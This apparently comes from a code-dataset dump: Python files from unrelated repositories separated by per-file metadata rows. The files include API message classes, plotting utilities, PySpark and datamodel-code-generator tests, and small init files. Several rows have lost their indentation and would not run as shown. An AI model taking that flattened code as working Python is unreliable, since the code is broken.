find out more about this error model and how to work with it in the [API
Design Guide](https://cloud.google.com/apis/design/errors).
Messages:
DetailsValueListEntry: A DetailsValueListEntry object.
Fields:
code: The status code, which should be an enum value of google.rpc.Code.
details: A list of messages that carry the error details. There is a
common set of message types for APIs to use.
message: A developer-facing error message, which should be in English. Any
user-facing error message should be localized and sent in the
google.rpc.Status.details field, or localized by the client.
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class DetailsValueListEntry(_messages.Message):
r"""A DetailsValueListEntry object.
Messages:
AdditionalProperty: An additional property for a DetailsValueListEntry
object.
Fields:
additionalProperties: Properties of the object. Contains field @type
with type URL.
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a DetailsValueListEntry object.
Fields:
key: Name of the additional property.
value: A extra_types.JsonValue attribute.
"""
key = _messages.StringField(1)
value = _messages.MessageField('extra_types.JsonValue', 2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
code = _messages.IntegerField(1, variant=_messages.Variant.INT32)
details = _messages.MessageField('DetailsValueListEntry', 2, repeated=True)
message = _messages.StringField(3)
encoding.AddCustomJsonFieldMapping(
StandardQueryParameters, 'f__xgafv', '$.xgafv')
encoding.AddCustomJsonEnumMapping(
StandardQueryParameters.FXgafvValueValuesEnum, '_1', '1')
encoding.AddCustomJsonEnumMapping(
StandardQueryParameters.FXgafvValueValuesEnum, '_2', '2')
| 40.025873 | 130 | 0.748416 | 3,562 | 30,940 | 6.436833 | 0.13251 | 0.010249 | 0.023726 | 0.014044 | 0.736043 | 0.730809 | 0.722872 | 0.710659 | 0.697313 | 0.687674 | 0 | 0.009556 | 0.184874 | 30,940 | 772 | 131 | 40.07772 | 0.899564 | 0.648643 | 0 | 0.518182 | 1 | 0 | 0.146288 | 0.100776 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.045455 | 0 | 0.559091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
5df02750eeb9c3ab14ff05b51de938db35e89f08 | 129 | py | Python | myconst/cmdlist.py | kimi0230/gogopowerkimibot | 5aa8e725a7d50020b28086cb9e8e06a5d2ebaf9d | [
"MIT"
] | 4 | 2021-06-26T13:15:43.000Z | 2021-12-16T03:39:58.000Z | myconst/cmdlist.py | kimi0230/gogopowerkimibot | 5aa8e725a7d50020b28086cb9e8e06a5d2ebaf9d | [
"MIT"
] | 1 | 2021-09-23T01:29:46.000Z | 2021-09-23T01:29:46.000Z | myconst/cmdlist.py | kimi0230/gogopowerkimibot | 5aa8e725a7d50020b28086cb9e8e06a5d2ebaf9d | [
"MIT"
] | null | null | null | CMD_LIST = "卡比請客\n笑鼠人\n吱吱\n蔡章章戶頭\n發票 {數字N: 代表前N期}\n疫情\n匯率 {幣別}\nt:{英文單字}`: 取得翻譯 音標 詞性\n天文\n天文月\n樂透\n三大\n外資{數字N: 代表前N名}\nevent\n"
| 64.5 | 128 | 0.689922 | 26 | 129 | 3.384615 | 0.961538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.077519 | 129 | 1 | 129 | 129 | 0.739496 | 0 | 0 | 0 | 0 | 1 | 0.891473 | 0.403101 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f8ea49ff31b0f2dcf535fd1ed8d595aa10afdb24 | 71 | py | Python | cvstudio/view/widgets/gallery/__init__.py | haruiz/PytorchCvStudio | ccf79dd0cc0d61f3fd01b1b5d96f7cda7b681eef | [
"MIT"
] | 32 | 2019-10-31T03:10:52.000Z | 2020-12-23T11:50:53.000Z | cvstudio/view/widgets/gallery/__init__.py | haruiz/CvStudio | ccf79dd0cc0d61f3fd01b1b5d96f7cda7b681eef | [
"MIT"
] | 19 | 2019-10-31T15:06:05.000Z | 2020-06-15T02:21:55.000Z | cvstudio/view/widgets/gallery/__init__.py | haruiz/PytorchCvStudio | ccf79dd0cc0d61f3fd01b1b5d96f7cda7b681eef | [
"MIT"
] | 8 | 2019-10-31T03:32:50.000Z | 2020-07-17T20:47:37.000Z | from .gallery import Gallery
from .gallery_action import GalleryAction
| 23.666667 | 41 | 0.859155 | 9 | 71 | 6.666667 | 0.555556 | 0.366667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.112676 | 71 | 2 | 42 | 35.5 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5d62aa42fdd117a5049536e14481b008871a1fc3 | 101 | py | Python | jpstat/estatFile/__init__.py | Alalalalaki/estat | 9670fe024b6ac484e863e93d970c445ce090a1df | [
"MIT"
] | 3 | 2021-01-03T21:46:08.000Z | 2021-09-13T03:03:46.000Z | jpstat/estatFile/__init__.py | Alalalalaki/estat | 9670fe024b6ac484e863e93d970c445ce090a1df | [
"MIT"
] | 1 | 2022-02-07T15:20:05.000Z | 2022-02-07T18:59:39.000Z | jpstat/estatFile/__init__.py | Alalalalaki/estat | 9670fe024b6ac484e863e93d970c445ce090a1df | [
"MIT"
] | null | null | null | from .core import get_stat, get_list, get_file
__all__ = [
"get_stat", "get_list", "get_file"
]
| 16.833333 | 46 | 0.683168 | 16 | 101 | 3.6875 | 0.5 | 0.237288 | 0.338983 | 0.474576 | 0.711864 | 0.711864 | 0 | 0 | 0 | 0 | 0 | 0 | 0.178218 | 101 | 5 | 47 | 20.2 | 0.710843 | 0 | 0 | 0 | 0 | 0 | 0.237624 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5383d8de0836d08f541526e3191729385686a7b5 | 1,864 | py | Python | utils.py | NogaBar/mr_robust_optim | ca949e34fc7a60aa0ed3c8b990edbe24175282f4 | [
"MIT"
] | null | null | null | utils.py | NogaBar/mr_robust_optim | ca949e34fc7a60aa0ed3c8b990edbe24175282f4 | [
"MIT"
] | null | null | null | utils.py | NogaBar/mr_robust_optim | ca949e34fc7a60aa0ed3c8b990edbe24175282f4 | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
import torch
def plot_weight_graph(epochs, loss_lists, labels, name=''):
epochs_array = np.arange(epochs)
ax = plt.axes(xlabel='epoch', ylabel='weight', xticks=np.arange(0, epochs, 10),
yticks=np.arange(0, 10.0, 0.1))
ax.set_title(name)
y_min = float('inf')
for loss_list, label in zip(loss_lists, labels):
plt.plot(epochs_array, loss_list, label=label)
min_loss = min(loss_list).cpu() if torch.is_tensor(min(loss_list)) else min(loss_list)
y_min = min(y_min, min_loss)
ax.legend()
plt.grid(True, axis='y')
plt.ylim(bottom=y_min-0.1, top=1.)
plt.savefig('./images/%s.png'%name)
plt.clf()
def plot_accuracy_graph(epochs, loss_lists, labels, name=''):
epochs_array = np.arange(epochs)
ax = plt.axes(xlabel='epoch', ylabel='accuracy', xticks=np.arange(0, epochs, 10),
yticks=np.arange(0, 10.0, 0.1))
ax.set_title(name)
y_min = float('inf')
for loss_list, label in zip(loss_lists, labels):
plt.plot(epochs_array, loss_list, label=label)
y_min = min(y_min, min(loss_list))
ax.legend()
plt.grid(True, axis='y')
plt.ylim(bottom=y_min-0.1, top=1.0)
plt.savefig('./images/%s.png'%name)
plt.clf()
def plot_loss_graph(epochs, loss_lists, labels, name=''):
epochs_array = np.arange(epochs)
ax = plt.axes(xlabel='epoch', ylabel='loss', xticks=np.arange(0, epochs, 10),
yticks=np.arange(0, 10.0, 0.1))
ax.set_title(name)
y_min = float('inf')
for loss_list, label in zip(loss_lists, labels):
plt.plot(epochs_array, loss_list, label=label)
y_min = min(y_min, min(loss_list))
ax.legend()
plt.grid(True, axis='y')
plt.ylim(bottom=y_min-0.1, top=4.0)
plt.savefig('./images/%s.png'%name)
plt.clf() | 35.846154 | 94 | 0.633047 | 305 | 1,864 | 3.714754 | 0.193443 | 0.042365 | 0.079435 | 0.052957 | 0.859665 | 0.859665 | 0.859665 | 0.843778 | 0.843778 | 0.815534 | 0 | 0.025572 | 0.20279 | 1,864 | 52 | 95 | 35.846154 | 0.736878 | 0 | 0 | 0.695652 | 0 | 0 | 0.048257 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065217 | false | 0 | 0.065217 | 0 | 0.130435 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
53df2f43dc934a0c042c601213f890868c3bf949 | 45 | py | Python | build/lib/spontit/__init__.py | spontit/spontit-api-python-wrapper | aefaea168a1d41055733ecb798d8c7fce19dad1b | [
"MIT"
] | 22 | 2020-05-16T08:14:46.000Z | 2021-12-26T11:05:09.000Z | spontit/__init__.py | spontit/spontit-api-python-wrapper | aefaea168a1d41055733ecb798d8c7fce19dad1b | [
"MIT"
] | 8 | 2020-06-11T12:18:03.000Z | 2020-12-18T16:18:07.000Z | build/lib/spontit/__init__.py | joshwolff1/spontit_api | aefaea168a1d41055733ecb798d8c7fce19dad1b | [
"MIT"
] | 2 | 2020-08-24T08:00:49.000Z | 2021-08-21T10:53:36.000Z | from spontit.resource import SpontitResource
| 22.5 | 44 | 0.888889 | 5 | 45 | 8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088889 | 45 | 1 | 45 | 45 | 0.97561 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
53ed74035f84d7a525137481fc605d382a833b95 | 123 | py | Python | tests/test_root.py | jaraco/jaraco.windows | e858172b4d5ee91233a8cc5319de99f17848f090 | [
"MIT"
] | 21 | 2016-01-31T00:58:59.000Z | 2021-05-06T22:30:56.000Z | tests/test_root.py | jaraco/jaraco.windows | e858172b4d5ee91233a8cc5319de99f17848f090 | [
"MIT"
] | 14 | 2016-07-21T12:02:08.000Z | 2021-08-06T03:07:54.000Z | tests/test_root.py | jaraco/jaraco.windows | e858172b4d5ee91233a8cc5319de99f17848f090 | [
"MIT"
] | 5 | 2016-06-14T04:57:04.000Z | 2021-05-06T22:30:57.000Z | def test_namespace():
"""
A trivially simple test that will run on all platforms.
"""
__import__('jaraco')
| 20.5 | 59 | 0.634146 | 15 | 123 | 4.866667 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.252033 | 123 | 5 | 60 | 24.6 | 0.793478 | 0.447154 | 0 | 0 | 0 | 0 | 0.115385 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0.5 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
9907a7375f0aba70297b02cee91f0fd5b2032f79 | 155 | py | Python | author/admin.py | mentix02/medialist-backend | 397b1a382b12bab273360dadb0b3c32de43747cd | [
"MIT"
] | 1 | 2019-11-22T19:29:39.000Z | 2019-11-22T19:29:39.000Z | author/admin.py | mentix02/medialist-backend | 397b1a382b12bab273360dadb0b3c32de43747cd | [
"MIT"
] | 1 | 2019-11-25T09:50:07.000Z | 2021-07-15T07:05:28.000Z | author/admin.py | mentix02/medialist-backend | 397b1a382b12bab273360dadb0b3c32de43747cd | [
"MIT"
] | null | null | null | from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from author.models import Author
admin.site.register(Author, UserAdmin)
| 22.142857 | 47 | 0.832258 | 22 | 155 | 5.863636 | 0.5 | 0.155039 | 0.263566 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103226 | 155 | 6 | 48 | 25.833333 | 0.928058 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.75 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
54d0fe05fb05525ffe2b5adeaa2003d8939a592f | 1,689 | py | Python | src/banners.py | AveCaesarMorituriTeSalutant/BAT_CORE | 5e8acc60ff4871d42070e30cb6c6f4102660cd29 | [
"MIT"
] | 10 | 2020-12-10T09:40:08.000Z | 2022-02-23T04:38:31.000Z | src/banners.py | AveCaesarMorituriTeSalutant/BAT_CORE | 5e8acc60ff4871d42070e30cb6c6f4102660cd29 | [
"MIT"
] | null | null | null | src/banners.py | AveCaesarMorituriTeSalutant/BAT_CORE | 5e8acc60ff4871d42070e30cb6c6f4102660cd29 | [
"MIT"
] | 3 | 2021-04-12T14:43:30.000Z | 2021-05-31T07:47:43.000Z | from random import choice
BANNERS = [
"""
%% %%
%%%%% %%%%%
%%%%%%%%%%% %%%%%%%%%%%
%%%%%%%%%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%% % % %%%%%%%%%%%%%
%%%%%%%%%%%%% %% %% %%%%%%%%%%%%%
%%%%%%%%%%%%%% %%% %%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%% %%%%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%% %%%%%%%%% %%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%
%%%%%%%%%%%
%%%%%%%
%%%
%
GitHub - AveCaesarMorituriTeSalutant
WebPage - batt.gq
Created by Islamov Magomed
"""
]
def get_banner():
return choice(BANNERS)
| 46.916667 | 96 | 0.076969 | 20 | 1,689 | 6.45 | 0.9 | 0.20155 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.677916 | 1,689 | 35 | 97 | 48.257143 | 0.237132 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0.2 | 0.6 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
54d49fd9236f3c6a4dbb6935c27546ea72838ea5 | 73 | py | Python | resources/__init__.py | astheeggeggs/ukbb_pan_ancestry | 5e378d5582723a575da9b473c7220d2602f4bce9 | [
"MIT"
] | null | null | null | resources/__init__.py | astheeggeggs/ukbb_pan_ancestry | 5e378d5582723a575da9b473c7220d2602f4bce9 | [
"MIT"
] | null | null | null | resources/__init__.py | astheeggeggs/ukbb_pan_ancestry | 5e378d5582723a575da9b473c7220d2602f4bce9 | [
"MIT"
] | null | null | null | from .phenotypes import *
from .genotypes import *
from .results import * | 24.333333 | 25 | 0.767123 | 9 | 73 | 6.222222 | 0.555556 | 0.357143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150685 | 73 | 3 | 26 | 24.333333 | 0.903226 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0714ddc04d7cd16006b9202e989e22c10414b2db | 4,985 | py | Python | tests/test_df_rows.py | XD-DENG/Optimus | 13e7b180f0970addae77cafe128bd2a93be138a2 | [
"Apache-2.0"
] | 1 | 2020-08-15T06:58:59.000Z | 2020-08-15T06:58:59.000Z | tests/test_df_rows.py | XD-DENG/Optimus | 13e7b180f0970addae77cafe128bd2a93be138a2 | [
"Apache-2.0"
] | null | null | null | tests/test_df_rows.py | XD-DENG/Optimus | 13e7b180f0970addae77cafe128bd2a93be138a2 | [
"Apache-2.0"
] | null | null | null | from pyspark.sql.types import *
from optimus import Optimus
from optimus.helpers.json import json_enconding
from optimus.helpers.functions import deep_sort
import unittest
from pyspark.ml.linalg import Vectors, VectorUDT, DenseVector
import numpy as np
nan = np.nan
from optimus.audf import abstract_udf as audf
import datetime
from pyspark.sql import functions as F
op = Optimus(master='local')
source_df=op.create.df([('words', StringType(), True),('num', IntegerType(), True),('animals', StringType(), True),('thing', StringType(), True),('second', IntegerType(), True),('filter', StringType(), True)], [(' I like fish ', 1, 'dog dog', 'housé', 5, 'a'), (' zombies', 2, 'cat', 'tv', 6, 'b'), ('simpsons cat lady', 2, 'frog', 'table', 7, '1'), (None, 3, 'eagle', 'glass', 8, 'c')])
class Test_df_rows(unittest.TestCase):
maxDiff = None
@staticmethod
def test_rows_append():
actual_df =source_df.rows.append([('this is a word', 2, 'this is an animal', 'this is a thing', 64, 'this is a filter')])
expected_df = op.create.df([('words', StringType(), True),('num', IntegerType(), True),('animals', StringType(), True),('thing', StringType(), True),('second', IntegerType(), True),('filter', StringType(), True)], [(' I like fish ', 1, 'dog dog', 'housé', 5, 'a'), (' zombies', 2, 'cat', 'tv', 6, 'b'), ('simpsons cat lady', 2, 'frog', 'table', 7, '1'), (None, 3, 'eagle', 'glass', 8, 'c'), ('this is a word', 2, 'this is an animal', 'this is a thing', 64, 'this is a filter')])
assert (expected_df.collect() == actual_df.collect())
@staticmethod
def test_rows_between():
actual_df =source_df.rows.between('second',6,8)
expected_df = op.create.df([('words', StringType(), True),('num', IntegerType(), True),('animals', StringType(), True),('thing', StringType(), True),('second', IntegerType(), True),('filter', StringType(), True)], [('simpsons cat lady', 2, 'frog', 'table', 7, '1')])
assert (expected_df.collect() == actual_df.collect())
@staticmethod
def test_rows_between_equal():
actual_df =source_df.rows.between('second',6,8,equal=True)
expected_df = op.create.df([('words', StringType(), True),('num', IntegerType(), True),('animals', StringType(), True),('thing', StringType(), True),('second', IntegerType(), True),('filter', StringType(), True)], [(' zombies', 2, 'cat', 'tv', 6, 'b'), ('simpsons cat lady', 2, 'frog', 'table', 7, '1'), (None, 3, 'eagle', 'glass', 8, 'c')])
assert (expected_df.collect() == actual_df.collect())
@staticmethod
def test_rows_between_invert_equal():
actual_df =source_df.rows.between('second',6,8,invert=True,equal=True)
expected_df = op.create.df([('words', StringType(), True),('num', IntegerType(), True),('animals', StringType(), True),('thing', StringType(), True),('second', IntegerType(), True),('filter', StringType(), True)], [(' I like fish ', 1, 'dog dog', 'housé', 5, 'a'), (' zombies', 2, 'cat', 'tv', 6, 'b'), (None, 3, 'eagle', 'glass', 8, 'c')])
assert (expected_df.collect() == actual_df.collect())
@staticmethod
def test_rows_drop_by_dtypes():
actual_df =source_df.rows.drop_by_dtypes('filter','integer')
expected_df = op.create.df([('words', StringType(), True),('num', IntegerType(), True),('animals', StringType(), True),('thing', StringType(), True),('second', IntegerType(), True),('filter', StringType(), True)], [(' I like fish ', 1, 'dog dog', 'housé', 5, 'a'), (' zombies', 2, 'cat', 'tv', 6, 'b'), (None, 3, 'eagle', 'glass', 8, 'c')])
assert (expected_df.collect() == actual_df.collect())
@staticmethod
def test_rows_is_in():
actual_df =source_df.rows.is_in('num',2)
expected_df = op.create.df([('words', StringType(), True),('num', IntegerType(), True),('animals', StringType(), True),('thing', StringType(), True),('second', IntegerType(), True),('filter', StringType(), True)], [(' zombies', 2, 'cat', 'tv', 6, 'b'), ('simpsons cat lady', 2, 'frog', 'table', 7, '1')])
assert (expected_df.collect() == actual_df.collect())
@staticmethod
def test_rows_select_by_dtypes():
actual_df =source_df.rows.select_by_dtypes('filter','integer')
expected_df = op.create.df([('words', StringType(), True),('num', IntegerType(), True),('animals', StringType(), True),('thing', StringType(), True),('second', IntegerType(), True),('filter', StringType(), True)], [('simpsons cat lady', 2, 'frog', 'table', 7, '1')])
assert (expected_df.collect() == actual_df.collect())
@staticmethod
def test_rows_sort():
actual_df =source_df.rows.sort('num','desc')
expected_df = op.create.df([('words', StringType(), True),('num', IntegerType(), True),('animals', StringType(), True),('thing', StringType(), True),('second', IntegerType(), True),('filter', StringType(), True)], [(None, 3, 'eagle', 'glass', 8, 'c'), (' zombies', 2, 'cat', 'tv', 6, 'b'), ('simpsons cat lady', 2, 'frog', 'table', 7, '1'), (' I like fish ', 1, 'dog dog', 'housé', 5, 'a')])
assert (expected_df.collect() == actual_df.collect())
| 89.017857 | 491 | 0.63651 | 671 | 4,985 | 4.61699 | 0.14158 | 0.162686 | 0.029051 | 0.034861 | 0.848289 | 0.828922 | 0.823434 | 0.793092 | 0.793092 | 0.774371 | 0 | 0.016033 | 0.124173 | 4,985 | 55 | 492 | 90.636364 | 0.693541 | 0 | 0 | 0.363636 | 0 | 0 | 0.204413 | 0 | 0 | 0 | 0 | 0 | 0.145455 | 1 | 0.145455 | false | 0 | 0.181818 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0724afbae93e926bc6375caf64713f7778d03433 | 26,994 | py | Python | tests/test_main.py | skalarsystems/datamodel-code-generator | 6055368ace6ca616bd2bd2b398e63a2dd226813c | [
"MIT"
] | null | null | null | tests/test_main.py | skalarsystems/datamodel-code-generator | 6055368ace6ca616bd2bd2b398e63a2dd226813c | [
"MIT"
] | null | null | null | tests/test_main.py | skalarsystems/datamodel-code-generator | 6055368ace6ca616bd2bd2b398e63a2dd226813c | [
"MIT"
] | null | null | null | import shutil
from pathlib import Path
from tempfile import TemporaryDirectory
from typing import Mapping
import pytest
from _pytest.capture import CaptureFixture
from _pytest.tmpdir import TempdirFactory
from freezegun import freeze_time
from prance import ValidationError
from datamodel_code_generator.__main__ import Exit, main
DATA_PATH: Path = Path(__file__).parent / 'data'
OPEN_API_DATA_PATH: Path = DATA_PATH / 'openapi'
JSON_SCHEMA_DATA_PATH: Path = DATA_PATH / 'jsonschema'
JSON_DATA_PATH: Path = DATA_PATH / 'json'
YAML_DATA_PATH: Path = DATA_PATH / 'yaml'
TIMESTAMP = '1985-10-26T01:21:00-07:00'
@freeze_time('2019-07-26')
def test_main():
with TemporaryDirectory() as output_dir:
output_file: Path = Path(output_dir) / 'output.py'
return_code: Exit = main(
[
'--input',
str(OPEN_API_DATA_PATH / 'api.yaml'),
'--output',
str(output_file),
]
)
assert return_code == Exit.OK
assert (
output_file.read_text()
== '''# generated by datamodel-codegen:
# filename: api.yaml
# timestamp: 2019-07-26T00:00:00+00:00
from __future__ import annotations
from typing import List, Optional
from pydantic import AnyUrl, BaseModel, Field
class Pet(BaseModel):
id: int
name: str
tag: Optional[str] = None
class Pets(BaseModel):
__root__: List[Pet]
class User(BaseModel):
id: int
name: str
tag: Optional[str] = None
class Users(BaseModel):
__root__: List[User]
class Id(BaseModel):
__root__: str
class Rules(BaseModel):
__root__: List[str]
class Error(BaseModel):
code: int
message: str
class api(BaseModel):
apiKey: Optional[str] = Field(
None, description='To be used as a dataset parameter value'
)
apiVersionNumber: Optional[str] = Field(
None, description='To be used as a version parameter value'
)
apiUrl: Optional[AnyUrl] = Field(
None, description="The URL describing the dataset\'s fields"
)
apiDocumentationUrl: Optional[AnyUrl] = Field(
None, description='A URL to the API console for each API'
)
class apis(BaseModel):
__root__: List[api]
class Event(BaseModel):
name: Optional[str] = None
class Result(BaseModel):
event: Optional[Event] = None
'''
)
with pytest.raises(SystemExit):
main()
@freeze_time('2019-07-26')
def test_main_base_class():
with TemporaryDirectory() as output_dir:
output_file: Path = Path(output_dir) / 'output.py'
return_code: Exit = main(
[
'--input',
str(OPEN_API_DATA_PATH / 'api.yaml'),
'--output',
str(output_file),
'--base-class',
'custom_module.Base',
]
)
assert return_code == Exit.OK
assert (
output_file.read_text()
== '''# generated by datamodel-codegen:
# filename: api.yaml
# timestamp: 2019-07-26T00:00:00+00:00
from __future__ import annotations
from typing import List, Optional
from pydantic import AnyUrl, Field
from custom_module import Base
class Pet(Base):
id: int
name: str
tag: Optional[str] = None
class Pets(Base):
__root__: List[Pet]
class User(Base):
id: int
name: str
tag: Optional[str] = None
class Users(Base):
__root__: List[User]
class Id(Base):
__root__: str
class Rules(Base):
__root__: List[str]
class Error(Base):
code: int
message: str
class api(Base):
apiKey: Optional[str] = Field(
None, description='To be used as a dataset parameter value'
)
apiVersionNumber: Optional[str] = Field(
None, description='To be used as a version parameter value'
)
apiUrl: Optional[AnyUrl] = Field(
None, description="The URL describing the dataset\'s fields"
)
apiDocumentationUrl: Optional[AnyUrl] = Field(
None, description='A URL to the API console for each API'
)
class apis(Base):
__root__: List[api]
class Event(Base):
name: Optional[str] = None
class Result(Base):
event: Optional[Event] = None
'''
)
with pytest.raises(SystemExit):
main()
@freeze_time('2019-07-26')
def test_target_python_version():
with TemporaryDirectory() as output_dir:
output_file: Path = Path(output_dir) / 'output.py'
return_code: Exit = main(
[
'--input',
str(OPEN_API_DATA_PATH / 'api.yaml'),
'--output',
str(output_file),
'--target-python-version',
'3.6',
]
)
assert return_code == Exit.OK
assert (
output_file.read_text()
== '''# generated by datamodel-codegen:
# filename: api.yaml
# timestamp: 2019-07-26T00:00:00+00:00
from typing import List, Optional
from pydantic import AnyUrl, BaseModel, Field
class Pet(BaseModel):
id: int
name: str
tag: Optional[str] = None
class Pets(BaseModel):
__root__: List['Pet']
class User(BaseModel):
id: int
name: str
tag: Optional[str] = None
class Users(BaseModel):
__root__: List['User']
class Id(BaseModel):
__root__: str
class Rules(BaseModel):
__root__: List[str]
class Error(BaseModel):
code: int
message: str
class api(BaseModel):
apiKey: Optional[str] = Field(
None, description='To be used as a dataset parameter value'
)
apiVersionNumber: Optional[str] = Field(
None, description='To be used as a version parameter value'
)
apiUrl: Optional[AnyUrl] = Field(
None, description="The URL describing the dataset\'s fields"
)
apiDocumentationUrl: Optional[AnyUrl] = Field(
None, description='A URL to the API console for each API'
)
class apis(BaseModel):
__root__: List['api']
class Event(BaseModel):
name: Optional[str] = None
class Result(BaseModel):
event: Optional['Event'] = None
'''
)
with pytest.raises(SystemExit):
main()
@freeze_time('2019-07-26')
def test_main_autodetect():
with TemporaryDirectory() as output_dir:
output_file: Path = Path(output_dir) / 'output.py'
return_code: Exit = main(
[
'--input',
str(JSON_SCHEMA_DATA_PATH / 'person.json'),
'--output',
str(output_file),
'--input-file-type',
'auto',
]
)
assert return_code == Exit.OK
assert (
output_file.read_text()
== '''# generated by datamodel-codegen:
# filename: person.json
# timestamp: 2019-07-26T00:00:00+00:00
from __future__ import annotations
from typing import Any, List, Optional
from pydantic import BaseModel, Field, conint
class Person(BaseModel):
firstName: Optional[str] = Field(None, description="The person\'s first name.")
lastName: Optional[str] = Field(None, description="The person\'s last name.")
age: Optional[conint(ge=0.0)] = Field(
None, description='Age in years which must be equal to or greater than zero.'
)
friends: Optional[List] = None
comment: Optional[Any] = None
'''
)
with pytest.raises(SystemExit):
main()
@freeze_time('2019-07-26')
def test_main_autodetect_failed():
with TemporaryDirectory() as input_dir, TemporaryDirectory() as output_dir:
